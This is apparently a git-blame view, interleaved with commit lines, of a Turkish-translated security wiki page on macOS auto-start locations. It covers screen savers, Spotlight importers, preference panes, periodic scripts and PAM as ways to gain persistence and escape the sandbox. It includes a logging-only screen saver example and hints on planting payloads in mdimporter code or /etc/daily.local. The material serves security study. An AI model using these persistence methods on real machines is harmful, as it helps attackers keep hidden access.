-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Açıklama: [https://posts.specterops.io/saving-your-access-d562bf5bf90b](https://posts.specterops.io/saving-your-access-d562bf5bf90b)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [🟠](https://emojipedia.org/large-orange-circle)
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Ancak genel bir uygulama kum havuzunda sonlanacaksınız
 								* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4230: change request with no subject merged in GitBook

											
										
										
											2024-01-10 00:59:55 +00:00
+								* `/System/Library/Screen Savers`
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Root gerekli
 								* **Tetikleyici**: Ekran koruyucusunu seçin
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								* `/Library/Screen Savers`
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Root gerekli
 								* **Tetikleyici**: Ekran koruyucusunu seçin
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								* `~/Library/Screen Savers`
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Tetikleyici**: Ekran koruyucusunu seçin
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="375"><figcaption></figcaption></figure>
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Xcode'da yeni bir proje oluşturun ve yeni bir **Ekran Koruyucu** oluşturmak için şablonu seçin. Ardından, örneğin aşağıdaki kodu kullanarak kodunuzu ekleyin.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								**Derleyin** ve `.saver` paketini **`~/Library/Screen Savers`** dizinine kopyalayın. Sonra, Ekran Koruyucu GUI'yi açın ve üzerine tıkladığınızda birçok log oluşturmalıdır:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
 								{% code overflow="wrap" %}
 								```bash
 								sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "hello_screensaver"'
 								Timestamp                       (process)[PID]
 -09-27 22:55:39.622369+0200  localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver void custom(int, const char **)
 -09-27 22:55:39.622623+0200  localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView initWithFrame:isPreview:]
 -09-27 22:55:39.622704+0200  localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView hasConfigureSheet]
 								```
 								{% endcode %}
 								{% hint style="danger" %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Bu kodu yükleyen ikili dosyanın ayrıcalıklarında (`/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver`) **`com.apple.security.app-sandbox`** bulunduğundan dolayı **ortak uygulama kum havuzunun içinde olacaksınız**.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								{% endhint %}
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								Saver kodu:
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								```objectivec
 								//
 								//  ScreenSaverExampleView.m
 								//  ScreenSaverExample
 								//
 								//  Created by Carlos Polop on 27/9/23.
 								//
 								#import "ScreenSaverExampleView.h"
 								@implementation ScreenSaverExampleView
 								- (instancetype)initWithFrame:(NSRect)frame isPreview:(BOOL)isPreview
 								{
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
 								self = [super initWithFrame:frame isPreview:isPreview];
 								if (self) {
 								[self setAnimationTimeInterval:1/30.0];
 								}
 								return self;
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								}
 								- (void)startAnimation
 								{
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
 								[super startAnimation];
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								}
 								- (void)stopAnimation
 								{
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
 								[super stopAnimation];
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								}
 								- (void)drawRect:(NSRect)rect
 								{
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
 								[super drawRect:rect];
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								}
 								- (void)animateOneFrame
 								{
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
 								return;
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								}
 								- (BOOL)hasConfigureSheet
 								{
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
 								return NO;
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								}
 								- (NSWindow*)configureSheet
 								{
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
 								return nil;
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								}
 								__attribute__((constructor))
 								void custom(int argc, const char **argv) {
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
+								}
 								@end
 								```
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### Spotlight Eklentileri
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								yazı: [https://theevilbit.github.io/beyond/beyond\_0011/](https://theevilbit.github.io/beyond/beyond\_0011/)
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [🟠](https://emojipedia.org/large-orange-circle)
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Ancak uygulama kum havuzunda sona ereceksiniz
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kum havuzu çok sınırlı görünüyor
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* `~/Kütüphane/Spotlight/`
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Tetikleyici**: Spotlight eklentisi tarafından yönetilen bir uzantıya sahip yeni bir dosya oluşturulduğunda.
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* `/Kütüphane/Spotlight/`
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Tetikleyici**: Spotlight eklentisi tarafından yönetilen bir uzantıya sahip yeni bir dosya oluşturulduğunda.
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Root gerekli
 								* `/Sistem/Kütüphane/Spotlight/`
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Tetikleyici**: Spotlight eklentisi tarafından yönetilen bir uzantıya sahip yeni bir dosya oluşturulduğunda.
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Root gerekli
 								* `Some.app/İçerik/Kütüphane/Spotlight/`
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* **Tetikleyici**: Spotlight eklentisi tarafından yönetilen bir uzantıya sahip yeni bir dosya oluşturulduğunda.
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Yeni uygulama gereklidir
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Açıklama ve Sömürü
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Spotlight, macOS'in yerleşik arama özelliğidir ve kullanıcılara **bilgisayarlarındaki verilere hızlı ve kapsamlı erişim** sağlamak amacıyla tasarlanmıştır.\
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Bu hızlı arama yeteneğini kolaylaştırmak için Spotlight, **özel bir veritabanı** tutar ve çoğu dosyayı **ayıklamak suretiyle bir dizin oluşturur**, böylece dosya adları ve içerikleri üzerinden hızlı aramalar yapılabilir.
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Spotlight'ın temel mekanizması, 'mds' adlı merkezi bir süreci içerir ve bu süreç, Spotlight hizmetini yönetir. Buna ek olarak, farklı dosya türlerini dizinlemek gibi çeşitli bakım görevlerini yerine getiren çeşitli 'mdworker' cinleri bulunmaktadır (`ps -ef | grep mdworker`). Bu görevler, Spotlight içinde çeşitli dosya biçimlerini anlamasını ve dizinlemesini sağlayan Spotlight içe aktarıcı eklentileri veya **".mdimporter paketleri**" aracılığıyla mümkün hale getirilir.
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Eklentiler veya **`.mdimporter`** paketleri önceden belirtilen yerlerde bulunur ve yeni bir paket göründüğünde dakikalar içinde yüklenir (herhangi bir hizmeti yeniden başlatmaya gerek yoktur). Bu paketler, hangi **dosya türü ve uzantıları yönetebileceklerini** belirtmelidir; bu şekilde, belirtilen uzantıya sahip yeni bir dosya oluşturulduğunda Spotlight onları kullanacaktır.
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Yüklenmiş tüm `mdimporters`'ları **bulmak mümkündür:**
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
+								```bash
 								mdimport -L
 								Paths: id(501) (
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								"/System/Library/Spotlight/iWork.mdimporter",
 								"/System/Library/Spotlight/iPhoto.mdimporter",
 								"/System/Library/Spotlight/PDF.mdimporter",
 								[...]
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
+								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Ve örneğin **/Library/Spotlight/iBooksAuthor.mdimporter** bu tür dosyaları işlemek için kullanılır (`.iba` ve `.book` uzantıları arasında):
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
+								```json
 								plutil -p /Library/Spotlight/iBooksAuthor.mdimporter/Contents/Info.plist
 								[...]
 								"CFBundleDocumentTypes" => [
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+=> {
 								"CFBundleTypeName" => "iBooks Author Book"
 								"CFBundleTypeRole" => "MDImporter"
 								"LSItemContentTypes" => [
 => "com.apple.ibooksauthor.book"
 => "com.apple.ibooksauthor.pkgbook"
 => "com.apple.ibooksauthor.template"
 => "com.apple.ibooksauthor.pkgtemplate"
 								]
 								"LSTypeIsPackage" => 0
 								}
 								]
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
+								[...]
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								=> {
 								"UTTypeConformsTo" => [
 => "public.data"
 => "public.composite-content"
 								]
 								"UTTypeDescription" => "iBooks Author Book"
 								"UTTypeIdentifier" => "com.apple.ibooksauthor.book"
 								"UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor"
 								"UTTypeTagSpecification" => {
 								"public.filename-extension" => [
 => "iba"
 => "book"
 								]
 								}
 								}
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
+								[...]
 								```
 								{% hint style="danger" %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Başka `mdimporter`'ın Plist'ini kontrol ederseniz, **`UTTypeConformsTo`** girdisini bulamayabilirsiniz. Bu, yerleşik bir _Uniform Type Identifiers_ ([UTI](https://en.wikipedia.org/wiki/Uniform\_Type\_Identifier)) olduğu için uzantıları belirtmeye gerek duymaz.
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Ayrıca, Sistem varsayılan eklentileri her zaman önceliklidir, bu nedenle bir saldırgan yalnızca Apple'ın kendi `mdimporters` tarafından dizinlenmeyen dosyalara erişebilir.
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
+								{% endhint %}
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								Kendi içe aktarıcınızı oluşturmak için bu projeye başlayabilirsiniz: [https://github.com/megrimm/pd-spotlight-importer](https://github.com/megrimm/pd-spotlight-importer) ve ardından adı değiştirin, **`CFBundleDocumentTypes`**'ı değiştirin ve desteklemek istediğiniz uzantıları desteklemesi için **`UTImportedTypeDeclarations`** ekleyin ve bunları **`schema.xml`**'de yansıtın.\
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Ardından, **`GetMetadataForFile`** işlevinin kodunu değiştirerek, işlenen uzantıya sahip bir dosya oluşturulduğunda payload'unuzu çalıştırabilirsiniz.
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Son olarak, yeni `.mdimporter`'ınızı bir önceki konumlardan birine derleyin ve kopyalayın ve yüklendiğinde **günlükleri izleyerek** veya **`mdimport -L`** kontrol ederek kontrol edebilirsiniz.
-												GITBOOK-4106: change request with no subject merged in GitBook

											
										
										
											2023-10-01 18:04:16 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								### ~~Tercih Paneli~~
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% hint style="danger" %}
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Bu artık çalışmıyor gibi görünmüyor.
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% endhint %}
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0009/](https://theevilbit.github.io/beyond/beyond\_0009/)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [🟠](https://emojipedia.org/large-orange-circle)
 								* Belirli bir kullanıcı eylemi gerektirir
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* **`/System/Library/PreferencePanes`**
 								* **`/Library/PreferencePanes`**
 								* **`~/Library/PreferencePanes`**
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								#### Açıklama
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Bu artık çalışmıyor gibi görünmüyor.
 								## Root Kum Havuzu Atlatma
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% hint style="success" %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Burada, **kum havuzu atlatma** için yararlı olan başlangıç konumlarını bulabilirsiniz, bu da sadece bir dosyaya **yazarak** basitçe bir şeyi **yürütmenizi sağlar** ve **root** olmanızı ve/veya diğer **garip koşulları gerektirir.**
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% endhint %}
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								### Periyodik
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Açıklama: [https://theevilbit.github.io/beyond/beyond\_0019/](https://theevilbit.github.io/beyond/beyond\_0019/)
-												GITBOOK-4097: change request with no subject merged in GitBook

											
										
										
											2023-09-26 23:39:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [🟠](https://emojipedia.org/large-orange-circle)
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Ancak root olmanız gerekiyor
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)
-												GITBOOK-4097: change request with no subject merged in GitBook

											
										
										
											2023-09-26 23:39:35 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								#### Konum
-												GITBOOK-4097: change request with no subject merged in GitBook

											
										
										
											2023-09-26 23:39:35 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								* `/etc/periodic/daily`, `/etc/periodic/weekly`, `/etc/periodic/monthly`, `/usr/local/etc/periodic`
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Root gereklidir
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Tetikleyici**: Zaman geldiğinde
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								* `/etc/daily.local`, `/etc/weekly.local` veya `/etc/monthly.local`
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* Root gereklidir
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* **Tetikleyici**: Zaman geldiğinde
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								#### Açıklama ve Sömürü
 								Periyodik betikler (**`/etc/periodic`**), `/System/Library/LaunchDaemons/com.apple.periodic*`'de yapılandırılmış **başlatma hizmetleri** nedeniyle yürütülür. `/etc/periodic/`'de depolanan betikler dosya sahibi olarak **yürütülür**, bu nedenle bu, olası bir ayrıcalık yükseltmesi için çalışmayacaktır.
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								{% code overflow="wrap" %}
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								```bash
 								# Launch daemons that will execute the periodic scripts
 								ls -l /System/Library/LaunchDaemons/com.apple.periodic*
 								-rw-r--r--  1 root  wheel  887 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-daily.plist
 								-rw-r--r--  1 root  wheel  895 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-monthly.plist
 								-rw-r--r--  1 root  wheel  891 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-weekly.plist
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								# The scripts located in their locations
 								ls -lR /etc/periodic
 								total 0
 								drwxr-xr-x  11 root  wheel  352 May 13 00:29 daily
 								drwxr-xr-x   5 root  wheel  160 May 13 00:29 monthly
 								drwxr-xr-x   3 root  wheel   96 May 13 00:29 weekly
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								/etc/periodic/daily:
 								total 72
 								-rwxr-xr-x  1 root  wheel  1642 May 13 00:29 110.clean-tmps
 								-rwxr-xr-x  1 root  wheel   695 May 13 00:29 130.clean-msgs
 								[...]
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								/etc/periodic/monthly:
 								total 24
 								-rwxr-xr-x  1 root  wheel   888 May 13 00:29 199.rotate-fax
 								-rwxr-xr-x  1 root  wheel  1010 May 13 00:29 200.accounting
 								-rwxr-xr-x  1 root  wheel   606 May 13 00:29 999.local
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								/etc/periodic/weekly:
 								total 8
 								-rwxr-xr-x  1 root  wheel  620 May 13 00:29 999.local
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								```
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								{% endcode %}
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								Başka periyodik betikler de **`/etc/defaults/periodic.conf`** dosyasında belirtilir:
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								```bash
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								grep "Local scripts" /etc/defaults/periodic.conf
 								daily_local="/etc/daily.local"				# Local scripts
 								weekly_local="/etc/weekly.local"			# Local scripts
 								monthly_local="/etc/monthly.local"			# Local scripts
-												GITBOOK-3964: change request with no subject merged in GitBook

											
										
										
											2023-06-01 21:09:46 +00:00
+								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								Eğer `/etc/daily.local`, `/etc/weekly.local` veya `/etc/monthly.local` dosyalarından herhangi birini yazmayı başarırsanız, **er ya da geç yürütülecektir**.
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												GITBOOK-4146: change request with no subject merged in GitBook

											
										
										
											2023-11-02 16:52:21 +00:00
+								{% hint style="warning" %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Periyodik betik, **betiğin sahibi olarak yürütülecektir**. Dolayısıyla, eğer düzenli bir kullanıcı betiğin sahibiyse, betik o kullanıcı olarak yürütülecektir (bu, ayrıcalık yükseltme saldırılarını engelleyebilir).
-												GITBOOK-4146: change request with no subject merged in GitBook

											
										
										
											2023-11-02 16:52:21 +00:00
+								{% endhint %}
-												GITBOOK-4101: change request with no subject merged in GitBook

											
										
										
											2023-09-28 20:05:35 +00:00
+								### PAM
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								Yazı: [Linux Hacktricks PAM](../linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md)\
 								Yazı: [https://theevilbit.github.io/beyond/beyond\_0005/](https://theevilbit.github.io/beyond/beyond\_0005/)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated ['macos-hardening/macos-auto-start-locations.md'] to tr

											
										
										
											2024-02-13 00:51:21 +00:00
+								* Kum havuzunu atlamak için kullanışlı: [🟠](https://emojipedia.org/large-orange-circle)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:37:08 +00:00
+								* Ancak root olmanız gerekmektedir
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:46:32 +00:00
+								* TCC atlatma: [🔴](https://emojipedia.org/large-red-circle)
-												GITBOOK-4100: change request with no subject merged in GitBook

											
										
										
											2023-09-28 15:09:34 +00:00
-												Translated to Turkish

											
										
										
